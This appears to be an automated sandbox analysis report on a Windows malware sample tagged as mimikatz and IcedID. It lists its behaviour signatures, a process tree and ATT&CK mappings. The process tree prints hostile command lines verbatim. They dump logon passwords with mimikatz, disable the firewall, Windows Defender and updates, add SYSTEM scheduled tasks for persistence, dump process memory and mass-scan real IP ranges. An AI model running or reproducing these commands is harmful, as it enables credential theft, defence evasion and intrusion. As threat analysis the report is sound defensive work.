Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    21-06-2024 15:45

General

  • Target

    2024-06-21_37b804112adbfcfc256645bb5c468fa4_hacktools_icedid_mimikatz.exe

  • Size

    7.4MB

  • MD5

    37b804112adbfcfc256645bb5c468fa4

  • SHA1

    d8f7c8f4c8b1591b426b849df179205f0128d84d

  • SHA256

    2ecf88fe2e8f6a6f4ff58f01a2dcc1639e84e52d669b86dea8035c531829095e

  • SHA512

    413a55718a80bb45ab471dc8e7997a29cef295e9f18c97d322a8beb00d9c60c468746a4147169b61c6d034dfe6b20672dfbc4ecd84619f213c4a2aef6d62b31a

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (29254) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 22 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:348
      • C:\Windows\TEMP\bnnredviu\rfdelc.exe
        "C:\Windows\TEMP\bnnredviu\rfdelc.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:408
    • C:\Users\Admin\AppData\Local\Temp\2024-06-21_37b804112adbfcfc256645bb5c468fa4_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-06-21_37b804112adbfcfc256645bb5c468fa4_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1196
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\sigqqjuu\teyjnbz.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:2772
        • C:\Windows\sigqqjuu\teyjnbz.exe
          C:\Windows\sigqqjuu\teyjnbz.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1724
    • C:\Windows\sigqqjuu\teyjnbz.exe
      C:\Windows\sigqqjuu\teyjnbz.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2660
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2664
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2696
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2796
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2620
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2608
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:2624
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add policy name=Bastards description=FuckingBastards
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2756
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filteraction name=BastardsList action=block
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:2172
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\vvirtsfub\grnjhnqpn\wpcap.exe /S
                    2⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2948
                    • C:\Windows\vvirtsfub\grnjhnqpn\wpcap.exe
                      C:\Windows\vvirtsfub\grnjhnqpn\wpcap.exe /S
                      3⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in System32 directory
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2052
                      • C:\Windows\SysWOW64\net.exe
                        net stop "Boundary Meter"
                        4⤵
                          PID:1096
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop "Boundary Meter"
                            5⤵
                              PID:2120
                          • C:\Windows\SysWOW64\net.exe
                            net stop "TrueSight Meter"
                            4⤵
                              PID:744
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "TrueSight Meter"
                                5⤵
                                  PID:2392
                              • C:\Windows\SysWOW64\net.exe
                                net stop npf
                                4⤵
                                  PID:2348
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:2436
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:800
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:352
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:2752
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:2552
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:2760
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:844
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:2336
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:1784
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\vvirtsfub\grnjhnqpn\izsdvttau.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vvirtsfub\grnjhnqpn\Scant.txt
                                                2⤵
                                                • Loads dropped DLL
                                                PID:2332
                                                • C:\Windows\vvirtsfub\grnjhnqpn\izsdvttau.exe
                                                  C:\Windows\vvirtsfub\grnjhnqpn\izsdvttau.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vvirtsfub\grnjhnqpn\Scant.txt
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:776
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\vvirtsfub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vvirtsfub\Corporate\log.txt
                                                2⤵
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                PID:1256
                                                • C:\Windows\vvirtsfub\Corporate\vfshost.exe
                                                  C:\Windows\vvirtsfub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2108
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "izgynaved" /ru system /tr "cmd /c C:\Windows\ime\teyjnbz.exe"
                                                2⤵
                                                  PID:1988
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                    3⤵
                                                      PID:3068
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /sc minute /mo 1 /tn "izgynaved" /ru system /tr "cmd /c C:\Windows\ime\teyjnbz.exe"
                                                      3⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:2964
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "eypzsujiq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\sigqqjuu\teyjnbz.exe /p everyone:F"
                                                    2⤵
                                                      PID:1368
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        3⤵
                                                          PID:1504
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /sc minute /mo 1 /tn "eypzsujiq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\sigqqjuu\teyjnbz.exe /p everyone:F"
                                                          3⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3048
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qenydhpyd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bnnredviu\rfdelc.exe /p everyone:F"
                                                        2⤵
                                                          PID:1608
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                            3⤵
                                                              PID:328
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /sc minute /mo 1 /tn "qenydhpyd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bnnredviu\rfdelc.exe /p everyone:F"
                                                              3⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:3056
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:3004
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            PID:1952
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:1592
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static set policy name=Bastards assign=y
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:292
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:1940
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:2700
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:2604
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static set policy name=Bastards assign=y
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            PID:2764
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            PID:2576
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:2136
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:2156
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static set policy name=Bastards assign=y
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:2888
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c net stop SharedAccess
                                                            2⤵
                                                              PID:1032
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net stop SharedAccess
                                                                3⤵
                                                                  PID:2120
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 stop SharedAccess
                                                                    4⤵
                                                                      PID:1696
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c netsh firewall set opmode mode=disable
                                                                  2⤵
                                                                    PID:2448
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh firewall set opmode mode=disable
                                                                      3⤵
                                                                      • Modifies Windows Firewall
                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:1308
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c netsh Advfirewall set allprofiles state off
                                                                    2⤵
                                                                      PID:324
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh Advfirewall set allprofiles state off
                                                                        3⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:1300
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c net stop MpsSvc
                                                                      2⤵
                                                                        PID:2436
                                                                        • C:\Windows\SysWOW64\net.exe
                                                                          net stop MpsSvc
                                                                          3⤵
                                                                            PID:2760
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 stop MpsSvc
                                                                              4⤵
                                                                                PID:2872
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c net stop WinDefend
                                                                            2⤵
                                                                              PID:1036
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net stop WinDefend
                                                                                3⤵
                                                                                  PID:2864
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 stop WinDefend
                                                                                    4⤵
                                                                                      PID:2028
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c net stop wuauserv
                                                                                  2⤵
                                                                                    PID:1828
                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                      net stop wuauserv
                                                                                      3⤵
                                                                                        PID:1520
                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                          C:\Windows\system32\net1 stop wuauserv
                                                                                          4⤵
                                                                                            PID:844
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c sc config MpsSvc start= disabled
                                                                                        2⤵
                                                                                          PID:2180
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc config MpsSvc start= disabled
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:2904
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c sc config SharedAccess start= disabled
                                                                                          2⤵
                                                                                            PID:340
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              sc config SharedAccess start= disabled
                                                                                              3⤵
                                                                                              • Launches sc.exe
                                                                                              PID:2248
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c sc config WinDefend start= disabled
                                                                                            2⤵
                                                                                              PID:2184
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc config WinDefend start= disabled
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2552
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c sc config wuauserv start= disabled
                                                                                              2⤵
                                                                                                PID:316
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  sc config wuauserv start= disabled
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:2240
                                                                                              • C:\Windows\TEMP\xohudmc.exe
                                                                                                C:\Windows\TEMP\xohudmc.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:3000
                                                                                              • C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe
                                                                                                C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe -accepteula -mp 348 C:\Windows\TEMP\vvirtsfub\348.dmp
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1920
                                                                                              • C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe
                                                                                                C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe -accepteula -mp 1104 C:\Windows\TEMP\vvirtsfub\1104.dmp
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1612
                                                                                              • C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe
                                                                                                C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe -accepteula -mp 1172 C:\Windows\TEMP\vvirtsfub\1172.dmp
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2168
                                                                                              • C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe
                                                                                                C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe -accepteula -mp 2288 C:\Windows\TEMP\vvirtsfub\2288.dmp
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2932
                                                                                              • C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe
                                                                                                C:\Windows\TEMP\vvirtsfub\qiavilrqi.exe -accepteula -mp 2800 C:\Windows\TEMP\vvirtsfub\2800.dmp
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2776
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe /c C:\Windows\vvirtsfub\grnjhnqpn\scan.bat
                                                                                                2⤵
                                                                                                • Loads dropped DLL
                                                                                                PID:1868
                                                                                                • C:\Windows\vvirtsfub\grnjhnqpn\hujshnigi.exe
                                                                                                  hujshnigi.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops file in Windows directory
                                                                                                  PID:848
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                2⤵
                                                                                                  PID:2948
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                    3⤵
                                                                                                      PID:3976
                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                      3⤵
                                                                                                        PID:1636
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                        3⤵
                                                                                                          PID:3040
                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                          3⤵
                                                                                                            PID:2812
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                            3⤵
                                                                                                              PID:1872
                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                              3⤵
                                                                                                                PID:2672
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                                                            1⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1248
                                                                                                          • C:\Windows\SysWOW64\koaaya.exe
                                                                                                            C:\Windows\SysWOW64\koaaya.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:2900
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:952
                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                              taskeng.exe {9C6DAE3E-AB37-4007-94BF-9762D083B97B} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                              1⤵
                                                                                                                PID:2828
                                                                                                                • C:\Windows\system32\cmd.EXE
                                                                                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bnnredviu\rfdelc.exe /p everyone:F
                                                                                                                  2⤵
                                                                                                                    PID:1940
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                      3⤵
                                                                                                                        PID:2468
                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                        cacls C:\Windows\TEMP\bnnredviu\rfdelc.exe /p everyone:F
                                                                                                                        3⤵
                                                                                                                          PID:2604
                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\teyjnbz.exe
                                                                                                                        2⤵
                                                                                                                          PID:2084
                                                                                                                          • C:\Windows\ime\teyjnbz.exe
                                                                                                                            C:\Windows\ime\teyjnbz.exe
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:2724
                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\sigqqjuu\teyjnbz.exe /p everyone:F
                                                                                                                          2⤵
                                                                                                                            PID:2608
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                              3⤵
                                                                                                                                PID:1524
                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                cacls C:\Windows\sigqqjuu\teyjnbz.exe /p everyone:F
                                                                                                                                3⤵
                                                                                                                                  PID:2080
                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bnnredviu\rfdelc.exe /p everyone:F
                                                                                                                                2⤵
                                                                                                                                  PID:3648
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:3484
                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                      cacls C:\Windows\TEMP\bnnredviu\rfdelc.exe /p everyone:F
                                                                                                                                      3⤵
                                                                                                                                        PID:3680
                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\teyjnbz.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:3796
                                                                                                                                        • C:\Windows\ime\teyjnbz.exe
                                                                                                                                          C:\Windows\ime\teyjnbz.exe
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:3452
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\sigqqjuu\teyjnbz.exe /p everyone:F
                                                                                                                                        2⤵
                                                                                                                                          PID:3308
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            3⤵
                                                                                                                                              PID:3772
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\sigqqjuu\teyjnbz.exe /p everyone:F
                                                                                                                                              3⤵
                                                                                                                                                PID:3724
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:2584
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:292

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                              Execution

                                                                                                                                              System Services

                                                                                                                                              1
                                                                                                                                              T1569

                                                                                                                                              Service Execution

                                                                                                                                              1
                                                                                                                                              T1569.002

                                                                                                                                              Scheduled Task/Job

                                                                                                                                              1
                                                                                                                                              T1053

                                                                                                                                              Scheduled Task

                                                                                                                                              1
                                                                                                                                              T1053.005

                                                                                                                                              Persistence

                                                                                                                                              Create or Modify System Process

                                                                                                                                              2
                                                                                                                                              T1543

                                                                                                                                              Windows Service

                                                                                                                                              2
                                                                                                                                              T1543.003

                                                                                                                                              Event Triggered Execution

                                                                                                                                              2
                                                                                                                                              T1546

                                                                                                                                              Netsh Helper DLL

                                                                                                                                              1
                                                                                                                                              T1546.007

                                                                                                                                              Image File Execution Options Injection

                                                                                                                                              1
                                                                                                                                              T1546.012

                                                                                                                                              Scheduled Task/Job

                                                                                                                                              1
                                                                                                                                              T1053

                                                                                                                                              Scheduled Task

                                                                                                                                              1
                                                                                                                                              T1053.005

                                                                                                                                              Privilege Escalation

                                                                                                                                              Create or Modify System Process

                                                                                                                                              2
                                                                                                                                              T1543

                                                                                                                                              Windows Service

                                                                                                                                              2
                                                                                                                                              T1543.003

